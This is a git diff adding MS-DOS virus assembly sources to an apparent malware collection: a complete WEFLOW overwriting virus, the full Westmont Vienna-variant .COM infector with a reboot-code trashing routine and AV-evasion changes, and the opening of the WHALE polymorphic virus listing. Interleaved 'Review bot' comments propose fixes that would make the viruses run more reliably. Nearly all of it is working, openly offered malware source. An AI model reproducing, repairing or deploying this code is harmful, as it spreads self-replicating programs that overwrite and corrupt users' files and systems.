+Rems equ $-LI + db 'DrWeb - !' + +Old_BEGIN equ $-Entry + db 0c3h + db BEG_LEN-1 dup (90h) + +Count equ $-Entry + db ? + +db 'RedArc // [TAVC]' + +Crypt_End equ $-Entry +Crypt_LEN equ $-LBL1 + +LBL equ $-Entry + +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.weflow.asm b/MSDOS/Virus.MSDOS.Unknown.weflow.asm new file mode 100644 index 00000000..ff3adc9c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.weflow.asm 
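Review bot: The second header line is mis-encoded (it renders as `⢮ Search`) and nothing readable says how this variant differs from web_390; the one behavioural change visible in the hunk is the `Count` byte that makes `Close_File` fall through to `Not_Found` after a single infection, so the header should say so, e.g. `; Same engine as Web390; the Count flag limits it to one .COM per run`. The garbled line is presumably CP866 Cyrillic decoded as UTF-8 and should be re-encoded or replaced with ASCII. The marker check `cmp byte ptr ds:[si+14h],'!'` is carried over unchanged and still reads beyond the BEG_LEN bytes loaded into Old_BEGIN, so the same offset correction (`[si+BEG_LEN-1]`) applies here.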
@@ -0,0 +1,35 @@
+;|
+;| WEFLOW 1993 VIRUS BY TESLA 5
+;|
+;| THIS VIRUS IS BASED ON THE TRIDENT OVERWRITING VIRUS. SORRY FOR
+;| LAMING AROUND, BUT IT KEEPS VARIANTS RISING. GREETINGS TO TRIDENT,
+;| NUKE, PHALCON/SKISM AND YAM. YOU DON'T KNOW ME, BUT I DO...
+;|
+ ORG 100H
+
+MAIN: MOV AH,4EH
+NOTSOCOOL: LEA DX,FF
+ INT 21H
+ JNC COOL
+ RET
+
+COOL: MOV AX,3D02H
+ MOV DX,9EH
+ INT 21H
+
+ XCHG AX,BX
+ MOV CL,VLEN
+ MOV AH,40H
+ INT 21H
+
+ MOV AH,3EH
+ INT 21H
+
+ MOV AH,4FH
+ JMP NOTSOCOOL
+
+FF DB '*.*',0
+
+ DB 'WEFLOW93'
+
+VLEN EQU $-MAIN
diff --git a/MSDOS/Virus.MSDOS.Unknown.westmont.asm
new file mode 100644
index 00000000..5b831f19
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.westmont.asm
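Review bot: CX is never initialised before the find-first call: `MOV AH,4EH` / `LEA DX,FF` / `INT 21H` use whatever CX held at .COM entry as the attribute mask, so which files `*.*` matches depends on the DOS version's entry-register state; a `MOV CX,7` (or `XOR CX,CX`) belongs before the `INT 21H`. The same unknown CH survives into the write, because `MOV CL,VLEN` sets only the low byte, so the 40h call writes CH*256+VLEN bytes instead of the virus body; `MOV CX,VLEN` fixes both the length and the dependency. Since the mask is `*.*`, the write also hits non-executables and the virus's own file, which the header should state rather than leaving to the reader.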
@@ -0,0 +1,597 @@ +; Westmont: A vienna strain +; This is a variation on the Vienna virus which has had sections of its +; code moved around and rewritten in hopes that AV software will +; not be able to recognize it. The seconds flag used to make sure +; that a file isn't infected twice has been modified to 61. The +; check for DOS v1.x has been deleted. Thanks to 40Hex for the +; source to the original Vienna. What a novice (me) can do with +; well documented code! +;------------------------------------------------------------------------------ + +MOV_CX MACRO X + DB 0B9H + DW X +ENDM + +CODE SEGMENT + ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE + ORG $+0100H + +;***************************************************************************** +;Start out with a JMP around the remains of the original .COM file, into the +;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS. +;The rest of the file (first 3 bytes) are stored in the virus data area. +;***************************************************************************** + +VCODE: JMP virbeg + +;This was the rest of the original .COM file. 
Tiny and simple, this time + + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + +;************************************************************ +; The actual virus starts here +;************************************************************ + +v_start equ $ + +virbeg: JMP codesrt ; Jump around signature + DB "Westmont",0 + DB "Ender" +codesrt: + CALL memtrick ; Call offset setting procedure + JMP find_path ; Start ifect routine + +;********************************************************************** +; Here when it's time to close it up & end +;********************************************************************** + +all_done: + PUSH DS + +;********************************************************************** +; Restore old DTA +;********************************************************************** + + MOV AH,1AH + MOV DX,[SI+old_dta] + MOV DS,[SI+old_dts] + INT 21H + + POP DS + +;************************************************************************* +; Clear registers used, & do a weird kind of JMP 100. The weirdness comes +; in since the address in a real JMP 100 is an offset, and the offset +; varies from one infected file to the next. By PUSHing an 0100H onto the +; stack, we can RET to address 0100H just as though we JMPed there. 
+;********************************************************************** + +quit: + POP CX + XOR AX,AX + XOR BX,BX + XOR DX,DX + XOR SI,SI + MOV DI,OFFSET 0100H + PUSH DI + XOR DI,DI + + RET 0FFFFH + + +; Infection routine +; ~~~~~~~~~~~~~~~~~ + +;************************************************************ +; Find the "PATH=" string in the environment +;************************************************************ + +find_path: + POP SI + PUSH SI ;Get SI back + ADD SI,env_str ;Point to "PATH=" string in data area + LODSB + MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long + REPNZ SCASB ;Search for first character + MOV CX,4 + +;************************************************************ +; Loop to check for the next four characters +;************************************************************ + +check_next_4: + LODSB + SCASB + JNZ find_path ;If not all there, abort & start over + LOOP check_next_4 ;Loop to check the next character + + POP SI + POP ES + MOV [SI+path_ad],DI ;Save the address of the PATH + MOV DI,SI + ADD DI,wrk_spc ;File name workspace + MOV BX,SI ;Save a copy of SI + ADD SI,wrk_spc ;Point SI to workspace + MOV DI,SI ;Point DI to workspace + JMP SHORT slash_ok + +;********************************************************** +; Look in the PATH for more subdirectories, if any +;********************************************************** + +set_subdir: + CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended? 
+ JNZ found_subdir ;If not, there are more subdirectories + JMP all_done ;Else, we're all done + +;********************************************************** +; Here if there are more subdirectories in the path +;********************************************************** + +found_subdir: + PUSH DS + PUSH SI + MOV DS,ES:2CH ;DS points to environment segment + MOV DI,SI + MOV SI,ES:[DI+path_ad] ;SI = PATH address + ADD DI,wrk_spc ;DI points to file name workspace + +;*********************************************************** +; Move subdirectory name into file name workspace +;*********************************************************** + +move_subdir: + LODSB ;Get character + CMP AL,';' ;Is it a ';' delimiter? + JZ moved_one ;Yes, found another subdirectory + CMP AL,0 ;End of PATH string? + JZ moved_last_one ;Yes + STOSB ;Save PATH marker into [DI] + JMP SHORT move_subdir + +;****************************************************************** +; Mark the fact that we're looking through the final subdirectory +;****************************************************************** + +moved_last_one: + MOV SI,0 + +;****************************************************************** +; Here after we've moved a subdirectory +;****************************************************************** + +moved_one: + POP BX ;Pointer to virus data area + POP DS ;Restore DS + MOV [BX+path_ad],SI ;Address of next subdirectory + NOP + +;****************************************************************** +; Make sure subdirectory ends in a "\" +;****************************************************************** + + CMP CH,'\' ;Ends with "\"? 
+ JZ slash_ok ;If yes + MOV AL,'\' ;Add one, if not + STOSB + +;****************************************************************** +; Here after we know there's a backslash at end of subdir +;****************************************************************** + +slash_ok: + MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace + MOV SI,BX ;Restore SI + ADD SI,f_spec ;Point to "*.COM" + MOV CX,6 + REPZ MOVSB ;Move "*.COM",0 to workspace + + MOV SI,BX + +;******************************************************************* +; Find first string matching *.COM +;******************************************************************* + + MOV AH,4EH + MOV DX,wrk_spc +; NOP ;MASM will add this NOP here + ADD DX,SI ;DX points to "*.COM" in workspace + MOV CX,3 ;Attributes of Read Only or Hidden OK + INT 21H + + JMP SHORT find_first + +;******************************************************************* +; Find next ASCIIZ string matching *.COM +;******************************************************************* + +find_next: + MOV AH,4FH + INT 21H + +find_first: + JNB found_file ;Jump if we found it + JMP SHORT set_subdir ;Otherwise, get another subdirectory + +;******************************************************************* +; Here when we find a file +;******************************************************************* + +found_file: + MOV AX,[SI+dta_tim] ;Get time from DTA + AND AL,1FH ;Mask to remove all but seconds + CMP AL,1FH ;62 seconds -> already infected + JZ find_next ;If so, go find another file + + CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long? + JA find_next ;If too long, find another one + + CMP WORD PTR [SI+dta_len],0AH ;Is it too short? 
+ JB find_next ;Then go find another one + + MOV DI,[SI+nam_ptr] ;DI points to file name + PUSH SI ;Save SI + ADD SI,dta_nam ;Point SI to file name + +;******************************************************************** +; Move the name to the end of the path +;******************************************************************** + +more_chars: + LODSB + STOSB + CMP AL,0 + JNZ more_chars ;Move characters until we find a 00 + +;******************************************************************** +; Get File Attributes +;******************************************************************** + + POP SI + MOV AX,OFFSET 4300H + MOV DX,wrk_spc ;Point to \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI + INT 21H + + MOV [SI+old_att],CX ;Save the old attributes + +;******************************************************************** +; Rewrite the attributes to allow writing to the file +;******************************************************************** + + MOV AX,OFFSET 4301H ;Set attributes + AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird) + MOV DX,wrk_spc ;Offset of \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI ;Point to \path\name + INT 21H + +;******************************************************************** +; Open Read/Write channel to the file +;******************************************************************** + + MOV AX,OFFSET 3D02H ;Read/Write + MOV DX,wrk_spc ;Offset to \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI ;Point to \path\name + INT 21H + + JNB opened_ok ;If file was opened OK + JMP fix_attr ;If it failed, restore the attributes + +;******************************************************************* +; Get the file date & time +;******************************************************************* + +opened_ok: + MOV BX,AX + MOV AX,OFFSET 5700H + INT 21H + + MOV [SI+old_tim],CX ;Save file time + MOV [SI+ol_date],DX ;Save the date + 
+;******************************************************************* +; Get current system time +;******************************************************************* + + MOV AH,2CH + INT 21H + + AND DH,7 ;Last 3 bits 0? (once in eight) + JNZ seven_in_eight + +;******************************************************************* +; The special "one in eight" infection. If the above line were in +; its original form, this code would be run 1/8 of the time, and +; rather than appending a copy of this virus to the .COM file, the +; file would get 5 bytes of code that reboot the system when the +; .COM file is run. +;******************************************************************* + + MOV AH,40H ;Write to file + MOV CX,5 ;Five bytes + MOV DX,SI + ADD DX,reboot ;Offset of reboot code in data area + INT 21H + + JMP SHORT fix_time_stamp + + NOP + +;****************************************************************** +; Here's where we infect a .COM file with this virus +;****************************************************************** + +seven_in_eight: + MOV AH,3FH + MOV CX,3 + MOV DX,first_3 +; NOP ;MASM will add this NOP here + ADD DX,SI + INT 21H ;Save first 3 bytes into the data area + + JB fix_time_stamp ;Quit, if read failed + + CMP AX,3 ;Were we able to read all 3 bytes? 
+ JNZ fix_time_stamp ;Quit, if not + +;****************************************************************** +; Move file pointer to end of file +;****************************************************************** + + MOV AX,OFFSET 4202H + MOV CX,0 + MOV DX,0 + INT 21H + + JB fix_time_stamp ;Quit, if it didn't work + + MOV CX,AX ;DX:AX (long int) = file size + SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here) + MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction + + ADD CX,OFFSET c_len_y + MOV DI,SI ;Point DI to virus data area + SUB DI,OFFSET c_len_x + ;Point DI to reference vir_dat, at start of pgm + MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm + +;******************************************************************* +; Write virus code to file +;******************************************************************* + + MOV AH,40H + + MOV_CX virlen ;Length of virus, in bytes + + MOV DX,SI + SUB DX,OFFSET codelen ;Length of virus code, gives starting + ; address of virus code in memory + INT 21H + + JB fix_time_stamp ;Jump if error + + CMP AX,OFFSET virlen ;All bytes written? 
+ JNZ fix_time_stamp ;Jump if error + +;********************************************************************** +; Move file pointer to beginning of the file +;********************************************************************** + + MOV AX,OFFSET 4200H + MOV CX,0 + MOV DX,0 + INT 21H + + JB fix_time_stamp ;Jump if error + +;********************************************************************** +; Write the 3 byte JMP at the start of the file +;********************************************************************** + + MOV AH,40H + MOV CX,3 + MOV DX,SI ;Virus data area + ADD DX,jmp_op ;Point to the reconstructed JMP + INT 21H + +;********************************************************************** +; Restore old file date & time, with seconds modified to 62 +;********************************************************************** + +fix_time_stamp: + MOV DX,[SI+ol_date] ;Old file date + MOV CX,[SI+old_tim] ;Old file time + AND CX,OFFSET 0FFE0H + OR CX,1FH ;Seconds = 31/30 min = 62 seconds + MOV AX,OFFSET 5701H + INT 21H + +;********************************************************************** +; Close File +;********************************************************************** + + MOV AH,3EH + INT 21H + +;********************************************************************** +; Restore Old File Attributes +;********************************************************************** + +fix_attr: + MOV AX,OFFSET 4301H + MOV CX,[SI+old_att] ;Old Attributes + MOV DX,wrk_spc +; NOP ;MASM will add this NOP + ADD DX,SI ;DX points to \path\name in workspace + INT 21H + JMP all_done +; Offset setting procedure +; ~~~~~~~~~~~~~~~~~~~~~~~~ +memtrick: + PUSH CX + MOV DX,OFFSET vir_dat ;This is where the virus data starts. + ; The 2nd and 3rd bytes get modified. 
+ CLD ;Pointers will be auto INcremented + MOV SI,DX ;Access data as offset from SI + ADD SI,first_3 ;Point to original 1st 3 bytes of .COM + MOV DI,OFFSET 100H ;`cause all .COM files start at 100H + MOV CX,3 + REPZ MOVSB ;Restore original first 3 bytes of .COM + MOV SI,DX ;Keep SI pointing to the data area + + PUSH ES + MOV AH,2FH + INT 21H + +;************************************************************* +; Save the DTA address +;************************************************************* + + MOV [SI+old_dta],BX + MOV [SI+old_dts],ES ;Save the DTA address + + POP ES + +;************************************************************* +; Set DTA to point inside the virus data area +;************************************************************* + + MOV DX,dta ;Offset of new DTA in virus data area +; NOP ;MASM will add this NOP here + ADD DX,SI ;Compute DTA address + MOV AH,1AH + INT 21H ;Set new DTA to inside our own code + + PUSH ES + PUSH SI + MOV ES,DS:2CH + MOV DI,0 ;ES:DI points to environment + RET + +;************************************************************************ +;The virus data starts here. It's accessed off the SI register, per the +; comments as shown +;************************************************************************ + +vir_dat EQU $ + + ;Use this with (SI + old_dta) +olddta_ DW 0 ;Old DTA offset + + ;Use this with (SI + old_dts) +olddts_ DW 0 ;Old DTA segment + + ;Use this with (SI + old_tim) +oldtim_ DW 0 ;Old Time + + ;Use this with (SI + ol_date) +oldate_ DW 0 ;Old date + + ;Use this with (SI + old_att) +oldatt_ DW 0 ;Old file attributes + +;Here's where the first three bytes of the original .COM file go.(SI + first_3) + +first3_ EQU $ + INT 20H + NOP + +;Here's where the new JMP instruction is worked out + + ;Use this with (SI + jmp_op) +jmpop_ DB 0E9H ;Start of JMP instruction + + ;Use this with (SI + jmp_dsp) +jmpdsp_ DW 0 ;The displacement part + +;This is the type of file we're looking to infect. 
(SI + f_spec)
+
+fspec_ DB '*.COM',0
+
+ ;Use this with (SI + path_ad)
+pathad_ DW 0 ;Path address
+
+ ;Use this with (SI + nam_ptr)
+namptr_ DW 0 ;Pointer to start of file name
+
+ ;Use this with (SI + env_str)
+envstr_ DB 'PATH=' ;Find this in the environment
+
+ ;File name workspace (SI + wrk_spc)
+wrkspc_ DB 40h dup (0)
+
+ ;Use this with (SI + dta)
+dta_ DB 16h dup (0) ;Temporary DTA goes here
+
+ ;Use this with (SI + dta_tim)
+dtatim_ DW 0,0 ;Time stamp in DTA
+
+ ;Use this with (SI + dta_len)
+dtalen_ DW 0,0 ;File length in the DTA
+
+ ;Use this with (SI + dta_nam)
+dtanam_ DB 0Dh dup (0) ;File name in the DTA
+
+ ;Use this with (SI + reboot)
+reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0
+
+lst_byt EQU $ ;All lines that assemble into code are
+ ; above this one
+
+;*****************************************************************************
+;The virus needs to know a few details about its own size and the size of its
+; code portion. Let the assembler figure out these sizes automatically.
+;*****************************************************************************
+
+virlen = lst_byt - v_start ;Length, in bytes, of the entire virus
+codelen = vir_dat - v_start ;Length of virus code, only
+c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code
+c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP
+
+;*****************************************************************************
+;Because this code is being appended to the end of an executable file, the
+; exact address of its variables cannot be known. All are accessed as offsets
+; from SI, which is represented as vir_dat in the below declarations.
+;*****************************************************************************
+
+old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset
+old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment
+old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp
+ol_date = oldate_ - vir_dat ;Displacement to old file date stamp
+old_att = oldatt_ - vir_dat ;Displacement to old attributes
+first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM
+jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode
+jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP
+f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string
+path_ad = pathad_ - vir_dat ;Displacement to the path address
+nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer
+env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string
+wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace
+dta = dta_ - vir_dat ;Displacement to the temporary DTA
+dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA
+dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA
+dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA
+reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code
+
+ CODE ENDS
+END VCODE
+
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.whale.asm b/MSDOS/Virus.MSDOS.Unknown.whale.asm
new file mode 100644
index 00000000..8a41b71a
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.whale.asm
@@ -0,0 +1,5198 @@
+;=====================================================================
+;=====================================================================
+; The WHALE ;
+; ;
+; Listing erstellt 1991 , R. Hrner , Karlsruhe , FRGDR ;
+; ;
+;=====================================================================
+;=====================================================================
+code SEGMENT
+ ASSUME CS:code,DS:code,ES:CODE
+ .RADIX 16
+ ORG 100h
+;---------------------------------------------------------------------
+;----------------( Struktur der Entscheidungs-Tabelle fr INT 21h )---
+;---------------------------------------------------------------------
+IF_THEN STRUC
+WENN DB ?
+DANN DW ?
+ ENDS
+;==========================================( Der Decoder-Aufruf )===
+MDECODE MACRO Adr
+ CALL DECODE
+ DW @L&adr-L&Adr
+L&Adr:
+ ENDM
+;==========================================( der Coder-Aufruf )===
+MCODE MACRO Adr
+ CALL CODEIT
+ DB @L&Adr-L&Adr+1
+@L&Adr:
+ ENDM
+;---------------------------------------------------------------------
+;--------------------------------------------------( fr Mutanten )---
+L04BB5 EQU OFFSET D4BB5
+J00000 EQU L04BB5 - Offset Entry
+J11111 EQU L04BB5 - Offset @INT21
+ZweiByte EQU J00000 / 2
+DreiByte EQU J00000 / 3
+M_Size EQU OFFSET J03AD0-OFFSET J03A84
+;---------------------------------------------------------------------
+;-------------------------------------------( "Mutierende" Makros )---
+;---------------------------------------------------------------------
+CALL_INT21 MACRO Adr,adr1 ; Selbst-Relozierend
+
+ DB 0E8H
+ DW - (LL&ADR + J11111 + 1)
+LL&ADR EQU $-OFFSET ADR1
+ ENDM
+;---------------------------------------------------------------------
+CALL_ENTRY MACRO Adr,adr1 ; Selbst-Relozierend
+ DB 0E8H
+ DW - (CE&ADR + J00000 )
+CE&ADR EQU $-OFFSET ADR1
+ ENDM
+;---------------------------------------------------------------------
+JMP_ENTRY MACRO Adr,adr1 ; Selbst-Relozierend
+ DB 0E9H
+ DW - (JM&ADR + J00000 )
+JM&ADR EQU $-OFFSET ADR1
+ ENDM
+;=====================================================================
+;===============================================( zur relozierung )===
+;=====================================================================
+FirstByte EQU OFFSET @FirstByte-OFFSET VirStart ; 20h
+CODE_LEN EQU OFFSET LASTCODE-OFFSET @FirstByte ; 2385H
+CODE_START EQU OFFSET J04BCF - OFFSET @FirstByte ; 239FH
+;=====================================================================
+;============================================( vernderlicher Code)===
+;=====================================================================
+SwapCode_1 EQU Offset Decode - Offset VirStart ; 0A33h
+Swapcode_2 EQU OFFSET J03A20 - Offset VirStart ; 1210h
+Swapcode_3 EQU OFFSET J0491A - Offset J03047 ; 18D3h
+SwapCode_4 EQU OFFSET J03047 - Offset VirStart ; 0837H
+SwapCode_5 EQU OFFSET J03259 - Offset VirStart ; 0A49h
+SwapCode_6 EQU OFFSET J02CFF - Offset VirStart ; 04EFh
+SwapCode_7 EQU Offset SwitchByte-Offset VirStart;
+SwapCode_8 EQU Offset Int_02 - Offset VirStart ; 3181h
+;=====================================================================
+;========================================( einfacher zu schreiben )===
+;=====================================================================
+XorByte__1 EQU OFFSET D_4A5E - Offset VirStart ; 224Eh
+XorByte__2 EQU OFFSET D_4A79 - Offset VirStart ; 2269h
+;=====================================================================
+Part_____1 EQU OFFSET D4BAC - OFFSET VirStart ; 239Ch
+Len_Part_1 EQU OFFSET Lastbyte - Offset D4BAC ; 0054h
+;=====================================================================
+SchwimmZiel EQU OFFSET J029C1 - Offset VirStart ; 01B1h
+WischeWeg EQU OFFSET D4B7C - Offset VirStart ; 236Ch
+;=====================================================================
+SS_INIT EQU Offset EXE_SS_INIT-Offset VirStart
+SP_INIT EQU Offset EXE_SP_INIT-Offset VirStart
+CODE_INIT EQU Offset EXE_CODE_INIT-Offset VirStart
+;=====================================================================
+;=============================( Sprungtabelle fr Int 21h-Handler )===
+;=====================================================================
+L0699 EQU Offset J02ea9 - Offset VirStart
+L04f4 EQU Offset J02D04 - Offset VirStart
+L06E0 EQU Offset J02EF0 - Offset VirStart
+L06CA EQU Offset J02EDA - Offset VirStart
+L08CF EQU Offset J030DF - Offset VirStart
+L06C8 EQU Offset J02ED8 - Offset VirStart
+L0996 EQU Offset J031A6 - Offset VirStart
+L09E4 EQU Offset J031F4 - Offset VirStart
+L1E5E EQU Offset J0466E - Offset VirStart
+L1DA2 EQU Offset J045B2 - Offset VirStart
+L0AD4 EQU Offset J0325D - Offset VirStart
+L1F70 EQU Offset J04780 - Offset VirStart
+L1D0F EQU Offset J0451F - Offset VirStart
+;=====================================================================
+;==============================( wenn ein Debugger erkannt wird...)===
+;=====================================================================
+IfDebugWal EQU (Offset J04B6A-Offset CreateTempCode+1) / 2
+StartDebug EQU Offset CreateTempCode-Offset VirStart
+;=====================================================================
+;==========================================( Erklrung fehlt noch )===
+;=====================================================================
+@0478 EQU 0478H
+@FB88 EQU 10000h-@0478
+;=====================================================================
+;=================================================( COM-Einsprung )===
+;=====================================================================
+start: JMP ENTRY ; JMP Decode_Whale
+ DB 00h
+Whale_ID DW 020CCh ; kennung, da File infiziert
+;=====================================================================
+ DB 2300h-6 DUP (0)
+;---------------------------------------------------------------------
+;
+; DIESE DATEN WERDEN ZWAR **VOR** DEN CODE
+; ASSEMBLIERT, ABER ***HINTER*** DEM CODE ABGELEGT !!
+;
+; DAS IST DER ***EINZIGE GRUND*** WARUM DIE VIELEN
+; NULL-BYTES VOR DEM WAL STEHEN !!!
+;
+; DER CODE IST Code_len BYTE LANG.
+;
+; AB OFFSET Code_len DRFEN ALSO DATEN STEHEN.
+; DESHALB GIBT ES AUCH KEINE DATEN, DIE ***VOR*** DIESEM
+; OFFSET ABGELEGT WERDEN !
+;====================================================================
+;===========================================( Speichereinteilung )===
+;====================================================================
+; Assemblierungszeit : Zur Laufzeit (resident):
+;
+; +-CS:0100=DS:0100-+ +--CS:0000-DS:2810-+ <- Segment 9D90h
+; | | | Code |
+; | Leer | | |
+; | | | |
+; +-CS:2400=DS:2400-+ +--CS:2400-DS:4C10-+ (DS:4C43=CS:2433!)
+; | Daten | | DATEN |
+; +-CS:2700=DS:2700-+ +--CS:2700-DS:4F10-+ <--Speicherbedarf
+; | Leer | | Grafikkarte | incl. Zugriff auf
+; +-CS:2800=DS:2800-+ | | residenten
+; | Save-Daten+Code | | | COMMAND.COM
+; +-CS:2810=DS:2810-+ | |
+; | | | |
+; | Code | | |
+; | | | |
+; +-CS:4c00=DS:4C00-+ +------------------+
+;
+;---------------------------------------------------------------------
+OFFSET_2400:
+CodBuf DB 1Ch DUP (?) ; Wirts-File-Beginn / Puffer
+;---------------------------------------------------------------------
+D241C DB ?
+D241D DB ?
+D241E DW ?
+D2420 DW ?
+D2422 DW ?
+D2424 DD ? ; Adresse des exec-param-blocks
+D2428 DB ? ; Drive des aktuellen Files
+FileTime DW ? ; File-Uhrzeit
+FileDate DW ? ; File-Datum
+Trace_Adres DD ? ; Temp-DD fr Trace-Adresse
+D2431 DW ?
+D2433 DB ? ; "1" : Nach Verschluesselung INT 21h
+ ; ausfhren und wieder Entschluesseln.
+D2434 DB ?
+Low_INT_21H DD ? ; IBMDOS-Adresse INT 21h
+@Int_13h DD ? ; Adresse INT 13h
+D243D DD ? ; Adresse INT 24H
+PSP_SEG DW ? ; PSP-SEGMENT
+D2443 DW ?
+D2445 DW ?
+D2447 DW ? ; Erster MCB / Tracesegment
+D2449 DW ?
+;---------------------------------------------------------------------
+;--------------------------------------------( wird "JMP CS:2256" )---
+;--------------------------------------------( also "JMP VirInt21")---
+D244B DB ?
+D244C DW ?
+D244E DW ?
+;---------------------------------------------------------------------
+D2450 DW ? ; Trace-Kontrollwort
+D2452 DW 14h DUP (?)
+D247A DW 14h DUP (?)
+D24A2 DB ? ;
+@PSP DW ? ; Aktuelles PSP-Segment
+FilePos DD ? ; File-Pos
+FileSize DD ? ; File-Size
+D24AD DW ? ; Offset des Caller-Lese-Puffers
+D24AF DW ? ; Anzahl der zu lesenden Byte
+D24B1 DW ?
+D24B3 DW ? ; CALLERS - Flags !
+D24B5:
+@FCB DB 25h DUP (?) ; FCB
+Error DB ? ; ERROR aufgetreten ; 24DA
+D24DB DW ?
+D24DD DW ? ; PLatz fr SS
+D24DF DW ? ; Platz fr SP
+D24E1 DW ?
+D24E3 DW ? ; Platz fr AX
+D24E4 DW ?
+;---------------------------------------------------------------------
+D24E6 DW ? ; Caller-IP ?
+D24E8 DW ? ; Caller-CS ?
+D24EA DW ? ; Returnadresse zwischen Push/Pop
+D24EC DW ? ;
+D24EE DB ?
+D24EF DB ?
+;---------------------------------------------------------------------
+D24F0 DB ?
+EPB DB ? ; Start EPB
+D24F2 DW ? ; File-Attribut
+D24F4 DW ? ; Offset Filename / ASCIIZ
+D24F6 DW ? ; Segment Filename / ASCIIZ
+D24F8 DW ? ;
+D24FA DW ? ;
+D24FC DW ?
+D24FE DB ?
+;---------------------------------------------------------------------
+D24FF DW ? ; SP-init
+D2501 DW ? ; SS-init
+D2503 DW ? ; IP-init
+D2505 DW ? ; CS-init
+;---------------------------------------------------------------------
+Cmd_Line DB 50H dup (?) ; command-line
+;---------------------------------------------------------------------
+D2557 DW ? ; Orig.SP
+D2559 DW ? ; Orig.SS
+Vir_SP DW ? ; Vir. SP
+D245D DW ?
+D245F DB ?
+D2560 DW ? ; Platz fr AX
+D2562 DW ? ; Platz fr BX
+D2564 DW ? ; Platz fr CX
+;-------------------------------( als virtuelle Code-Area genutzt )---
+@INT21 DD ? ; ADRESSE Original INT 21H
+D256A DW ?
+D256C DW ?
+D256E DW ?
+;-------------------------------------------( wird "JMP CS:2273" )---
+;-------------------------------------------( also "JMP VirInt09" )---
+D2570 DB ?
+D2571 DW ?
+D2573 DW ?
+;---------------------------------------------------------------------
+D2575 DW ? ; SAVE SI
+D2577 DW ? ; SAVE DI
+D2579 DW ? ; SAVE AX
+D257B DW ? ; SAVE DS
+D257D DW ? ; SAVE ES
+D257F DW ? ; SAVE CX
+;---------------------------------------------------------------------
+D2581 DW ? ; SAVE BX
+INT_09 DD ? ; Original INT 09
+D2587 DB ? ; wird bei J02975 geschrieben
+D2588 DW ?
+D258A DW ?
+InfectFlag DB ? ; "1" nach der ersten Infektion
+D258D DB ?
+D258E DW ? ; Platz fr Flags
+;---------------------------------------------------------------------
+D2590 DW ? ; SAVE DX
+@INT02 DD ? ; Originaler INT 02
+TrashFlag DB ? ; "1" : Statt einer Infektion,
+ ; wird Trash weggeschrieben
+D2597 DB ?
+D2598 DW ? ; hier kommt z.B. "HLT" hin...
+D259A DW ? ;
+;---------------------------------------------------------------------
+D259C DD ?
+D25A0 DB 160h DUP (0)
+
+D2700: ; VIRUS-STACK -^^^
+;---------------------------------------------------------------------
+ DB 100 DUP (0)
+J02801: DB 0
+J02802: DB 0
+J02803: DB 0
+J02804: DB 0
+J02805: DB 0
+J02806: DB 0
+J02807: DB 0
+;---------------------------------------------------------------------
+J02808: MOV AH,4Ch ; main() :-)))
+ MOV AL,[ErrorCode]
+ INT 21
+ErrorCode DB 00h
+;---------------------------------------------------------------------
+; Hier beginnt WHALE
+;---------------------------------------------------------------------
+VIRSTART: DB 00h ;02810
+J02811: JMP Decode_Whale
+;=====================================================================
+;======( Puffer fr die ersten 1Ch Byte des infizierten Programmes)===
+;=====================================================================
+EXE_ID: DW 04CB4H ; 'MZ' / MOV AH,4C
+EXE_LastBytes: DW 021CDH ; Lastbytes / INT 21
+EXE_Pages: DW 0 ; Pages
+EXE_Rel_Count DW 0 ; Reloc-Count
+EXE_Paras: DW 0 ; Headerpara
+EXE_MinFree: DW 0 ; minfree
+EXE_MaxFree: DW 0 ; maxfree
+EXE_SS_INIT: DW 0 ; ss-init
+EXE_SP_INIT: DW 0 ; sp-init
+EXE_ByteSum: DW 0 ; bytesum
+EXE_CODE_INIT: DD 0 ; ip-init, cs-init
+EXE_Reloc_Ofs: Dw 0 ; reloc-offset
+EXE_Ovl_Num: DW 0 ; ovl-num
+;---------------------------------------------------------------------
+@FIRSTBYTE: ;<----------------( erstes Byte im oberen Segment )---
+EXE_FLAG DB 0 ; "1" : EXE-FILE
+;=====================================================================
+;==================================( erster CALL nach Dekodierung )===
+;==================================( 'echter' Einsprung )===
+;=====================================================================
+Offset_2831:
+ENTRY: CALL J0288E
+;---------------------------------------------------------------------
+Vir_NAME: DB "THE WHALE"
+;---------------------------------------------------------------------
+ DB 0ffh
+ db 036h
+ db 0c7h
+;----------------------------------------------------------(trash?)---
+ PUSH ES
+J02842: PUSH BX
+ INC WORD Ptr DS:[0458h] ; evtl Cursor-Loc auf
+ JNZ J0284C ; page 5 (??!??)
+ JMP J02A4F ; -> Nirwana
+;====================================================()===============
